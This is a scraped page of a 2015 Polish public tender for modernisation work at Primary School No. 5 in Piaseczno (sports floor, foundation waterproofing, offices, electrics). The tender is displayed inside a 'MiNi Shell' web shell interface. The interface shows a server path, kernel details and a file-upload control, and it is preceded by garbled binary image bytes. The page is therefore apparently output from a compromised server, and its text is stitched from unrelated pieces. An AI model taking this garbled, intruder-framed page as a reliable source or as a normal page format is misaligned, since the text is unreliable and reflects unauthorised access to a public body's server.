JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150615/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150615/86963-N-2015.html

<p class="kh_header"><b>Piaseczno: Prace modernizacyjne w budynku Szkoły Podstawowej nr 5 położonej przy ul. Szkolnej w Piasecznie</b><br>
<b>Numer ogłoszenia: 86963 - 2015; data zamieszczenia: 15.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy  Piaseczno , ul. Kościuszki 5, 05-500 Piaseczno, woj. mazowieckie, tel. 022 70 17 654, 70 17 655, faks 022 70 17 692.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piaseczno.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace modernizacyjne w budynku Szkoły Podstawowej nr 5 położonej przy ul. Szkolnej w Piasecznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace modernizacyjne w budynku Szkoły Podstawowej nr 5 położonej przy ul. Szkolnej w Piasecznie w następujących częściach: I - Modernizacja podłogi sportowej w hali sportowej o powierzchni użytkowej 1026,00 m2 - warstwa wierzchnia (dąb) min. 5,5 mm. II - Wykonanie izolacji przeciwwodnej pionowej na ścianach fundamentowych wraz z wykonaniem izolacji przeciwwilgociowej na ścianach oporowych poniżej terenu przy wejściu do pomieszczeń szatni. III - Prace modernizacyjne w pomieszczeniach administracyjnych. IV - Modernizacyjna instalacji oświetleniowej i elektrycznej. TERMIN ZAMÓWIENIA:   Dla części I:
Zakończenie prac budowlanych  w terminie  3 miesięcy  od daty  zawarcia umowy. 
Rozpoczęcie  prac budowlanych  w ciągu 7 dni  od dnia zawarcia umowy. 
Dla części II:  Zakończenie prac budowlanych  do dnia 24.08.2015r.
Rozpoczęcie  prac budowlanych  w ciągu 7 dni  od dnia zawarcia umowy. 
Dla części III:  Zakończenie prac budowlanych  do dnia 14.08.2015r.
Rozpoczęcie  prac budowlanych  w ciągu 7 dni  od dnia zawarcia umowy. 
Dla części IV:  
Zakończenie prac budowlanych  do dnia 24.08.2015r.
Rozpoczęcie  prac budowlanych  w ciągu 7 dni  od dnia zawarcia umowy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W części I  w skład zamówienia uzupełniającego będzie wchodzić modernizacja podłogi sportowej. 
W części II w skład zamówienia uzupełniającego będzie wchodzić wykonanie  izolacji  przeciwwodnej,
W części  III w skład zamówienia uzupełniającego będzie wchodzić modernizacja pomieszczeń  administracyjnych, 
W części  IV w skład zamówienia uzupełniającego będzie wchodzić modernizacja instalacji oświetleniowej</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przypadku składania ofert na:
    I część,  wysokość wadium wynosi 3.500 zł  ( trzy  tysiące pięćset   złotych).  
    II część,   wysokość wadium wynosi 2.500 zł  ( dwa tysiące  pięćset   złotych). 
     III  część,  wysokość wadium wynosi  500 zł  ( pięćset   złotych). 
     IV  część,  wysokość wadium wynosi 2.000 zł  ( dwa tysiące   złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz  robót budowlanych w zakresie niezbędnym do oceny spełniania  warunku wiedzy i doświadczenia, wykonanych  w okresie ostatnich pięciu lat  przez upływem terminu  składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy  - w tym okresie  z podaniem ich rodzaju i wartości, daty i miejsca  wykonania oraz załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób  należyty  oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  

Dla zamawiającego wykaz najważniejszych robót budowlanych to: wykaz minimum 
Dla zadania części  nr I
 -   wykazanie się  znajomością  wykonania podobnych robót  tj. wykonanie co najmniej 2 robót w ciągu  ostatnich 5 lat przed upływem  terminu składania ofert  o podobnym charakterze rzeczowym  do robót stanowiących  przedmiot zamówienia  to jest modernizacji podłogi sportowej  w hali sportowej  o powierzchni użytkowej co najmniej 1.000 m2  i o wartości  minimum 400.000 zł brutto każda   
Dla zadania  części nr II
 -   wykazanie się  znajomością  wykonania podobnych robót tj. wykonanie co najmniej 2 robót w ciągu  ostatnich 5 lat przed upływem  terminu składania ofert  o podobnym charakterze rzeczowym  do robót stanowiących  przedmiot zamówienia  to jest  wykonanie  izolacji  przeciwwilgociowej  pionowej na ścianach  fundamentowych  i o wartości  minimum 200.000 zł brutto każda,     

Dla zadania części  nr III 
- wykazanie się  znajomością  wykonania podobnych robót tj. wykonanie co najmniej 2 robót w ciągu  ostatnich 5 lat przed upływem  terminu składania ofert  o podobnym charakterze rzeczowym  do robót stanowiących  przedmiot zamówienia  to jest   prace modernizacyjne w  pomieszczeniach administracyjnych   o wartości  minimum 40.000 zł brutto każda     

Dla zadania części  nr IV
- wykazanie się  znajomością  wykonania podobnych robót tj. wykonanie co najmniej 2 robót w ciągu  ostatnich 5 lat przed upływem  terminu składania ofert  o podobnym charakterze rzeczowym  do robót stanowiących  przedmiot zamówienia  to jest   prace modernizacyjne  instalacji oświetleniowej  i elektrycznej  o wartości  minimum 120.000 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi  wykaz  osób, które będą uczestniczyć  w wykonywaniu  zamówienia  stwierdzający, że osoby te posiadają stosowne uprawnienia.
Dla części I
1.1 Osobę  proponowaną do pełnienia funkcji Kierownika Budowy
kierownika budowy przy realizacji modernizacji  podłogi  sportowej w hali sportowej  o powierzchni użytkowej  około 1000m2  obejmującego  przedmiot zamówienia  i o wartości       minimum 400.000 zł brutto    i  min 24 miesięcy doświadczenia na stanowisku kierownika budowy bądź kierownika robót.
Dla części II
1.2. Osobę  proponowaną do pełnienia funkcji Kierownika Budowy
kierownika budowy przy realizacji  wykonania  izolacji przeciwwilgociowej  pionowej  na ścianach fundamentowych  obejmującego przedmiot zamówienia     i o wartości       minimum 200.000 zł brutto    i  min 24 miesięcy doświadczenia na stanowisku kierownika budowy bądź kierownika robót.
Dla części III
Brak 
Dla części IV
1.3. Osobę  proponowaną do pełnienia funkcji Kierownika Budowy
kierownika robót elektrycznych  przy realizacji wykonania  modernizacji  instalacji  oświetleniowej i elektrycznej   obejmującego przedmiot zamówienia     i o wartości       minimum 120.000 zł brutto    i  min 24 miesięcy doświadczenia na stanowisku kierownika budowy w zakresie robót elektrycznych  bądź kierownika robót elektrycznych .


Osoby kierujące robotami budowlanymi powinny posiadać uprawnienia budowlane bez ograniczeń  
Konieczne jest przedstawienie  po jednej osoby ze stosownymi uprawnieniami -  udokumentowanymi kwalifikacjami zawodowymi. Osoba pełniąca funkcje kierownicze winna posiadać uprawnienia bez ograniczeń zgodnie z ustawą Prawo budowlane w specjalności, konstrukcyjno - budowlanej, elektrycznej,  właściwej  dla powierzonej funkcji lub odpowiadające  im ważne uprawnienia budowlane, które zostały wydane  na podstawie wcześniej  obowiązujących przepisów  oraz przynależność do właściwej Izby Inżynierów Budownictwa - w przypadku, gdy są one wymagane  odrębnymi przepisami obowiązującymi w danym kraju. Mając na uwadze  obowiązujące  w Polsce przepisy  prawa krajowego - ustawa Prawo budowlane art. 12  pkt 7 oraz art. 12a, w przypadku  osób  spoza terytorium Polski  możliwe jest  uzyskanie decyzji w sprawie  uznania kwalifikacji  zawodowych  w budownictwie  nabytych w państwach członkowskich UE oraz wpisu do stosownej izby, po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce. Powinno się to odbyć na zasadach określonych w Ustawie z dnia 18 marca 2008r o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (DZ. U z 2008r Nr 63, poz. 394).    Na zaświadczeniu  o członkostwie w Okręgowej Izby Inżynierów Budownictwa  winno  widnieć   aktualne na dzień składania ofert  ubezpieczenie od odpowiedzialności cywilnej. Osoba ta będzie pełnić funkcję kierowniczą. Wykonawca dodatkowo złoży oświadczenie, że osoba  która  będzie  uczestniczyć  w wykonywaniu zamówienia  posiada  wymagane prawem  uprawnienia. 
Powyższe winno być udokumentowane oświadczeniem zgodnie z  pkt  4.3  SIWZ a dokumenty przedłożone  przed podpisaniem umowy  zgodnie z pkt 13.6  SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I 
Informacji  banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  w wysokości 400.000,00zł brutto wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert. Powyższe winno być udokumentowane  zgodnie z pkt 4.5). SIWZ. 
Dla części II 
Informacji  banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  w wysokości 200.000,00zł brutto wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert. Powyższe winno być udokumentowane  zgodnie z pkt 4.5). SIWZ. 
Dla części III
Brak
Dla części IV 
Informacji  banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy  w wysokości 120.000,00zł brutto wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert. Powyższe winno być udokumentowane  zgodnie z pkt 4.5). SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>O zamówienie mogą ubiegać się wykonawcy, którzy:
1)	przedstawią wypełniony formularz ofertowy stanowiący załącznik nr 1; 
2)	dowód wpłaty /wniesienia wadium - zgodnie z pkt. 9.9.7 SIWZ; W przypadku wniesienia wadium w pieniądzu na rachunek bankowy - należy przedstawić dowód wpłaty.
Wadium wniesione w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym lub gwarancjach bankowych, gwarancjach ubezpieczeniowych, należy złożyć w oryginale w depozycie w kasie Urzędu Miasta i Gminy. W ofercie należy pozostawić kserokopię i dowód wniesienia do depozytu kasy Gminy. Dopuszcza się dołączenie w odrębnej kopercie tylko dowodu wniesienia wadium. 
3)  Tabela  wartości ofertowych dla każdej części z osobna</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin gwarancji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dotyczy  części  I, III, IV
Warunki zmiany umowy w sprawie zamówienia publicznego w związku z brzmieniem art. 144 ust 1 ustawy Prawo zamówień publicznych.
 W związku z brzmieniem art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający przewiduje możliwość zmiany niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)	 nie zawinionych  przez Wykonawcę, przedłużających się terminów uzyskania zgód i zezwoleń, koniecznych  do realizacji przedmiotu umowy, wydawanych  przez organy i podmioty niezależne od Wykonawcy i Zamawiającego lub innych okoliczności, których nie można było przewidzieć na etapie  przygotowania zamówienia pomimo zachowania należytej staranności przez Zamawiającego
b)	w przypadku wystąpienia opadów atmosferycznych  lub ujemnych temperatur, uniemożliwiających lub znacznie utrudniające prowadzenie robót.
c)	zmiany ustawowej stawki podatku VAT  ,
d)	w przypadku zmniejszenia zakresu robót

Dotyczy  części   II 
Warunki zmiany umowy w sprawie zamówienia publicznego w związku z brzmieniem art. 144 ust 1 ustawy Prawo zamówień publicznych.
 W związku z brzmieniem art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający przewiduje możliwość zmiany niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)	 nie zawinionych  przez Wykonawcę, przedłużających się terminów uzyskania zgód i zezwoleń, koniecznych  do realizacji przedmiotu umowy, wydawanych  przez organy i podmioty niezależne od Wykonawcy i Zamawiającego lub innych okoliczności, których nie można było przewidzieć na etapie  przygotowania zamówienia pomimo zachowania należytej staranności przez Zamawiającego

b)	zmiany ustawowej stawki podatku VAT  ,
c)	w przypadku zmniejszenia zakresu robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piaseczno.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Piaseczno, ul. Kościuszki 5, 05-500 Piaseczno, pok. 75 osobiście lub przekazem pocztowym. Wartość SIWZ - 293 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy Piaseczno, ul. Kościuszki 5, pok. 75 III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja podłogi sportowej w hali sportowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w części I jest modernizacja podłogi sportowej w hali sportowej o powierzchni użytkowej 1026,00 m2 w budynku Szkoły Podstawowej nr 5 położonej przy ul. Szkolnej 14 w Piasecznie. Zakres rzeczowy robót do realizacji: 1. Rozebranie istniejącej podłogi z desek na legarach. 2. Rozebranie drewnianych legarów oraz wszystkich elementów podłogi i istniejącej izolacji. 3. Demontaż wentylatorów i kanałów wentylacyjnych. 4. Przygotowanie podłoża do ułożenia elementów podłogi sportowej. 5. Montaż 4 wentylatorów o wydajności 100 m3/h łączni z kanałami wentylacyjnymi pod podłogą. 6. Montaż podłogi sportowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie izolacji przeciwwodnej pionowej na ścianach fundamentowych wraz z wykonaniem izolacji przeciwwilgociowej na ścianach oporowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części II jest: Wykonanie izolacji przeciwwodnej pionowej na ścianach fundamentowych oraz odprowadzenie wód opadowych w studniach okien piwnicznych szt. 7 wraz z wykonaniem izolacji przeciwwilgociowej na ścianach oporowych poniżej terenu przy wejściu do pomieszczeń szatni w budynku Szkoły Podstawowej nr 5 położonej przy ul. Szkolnej 14 w Piasecznie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
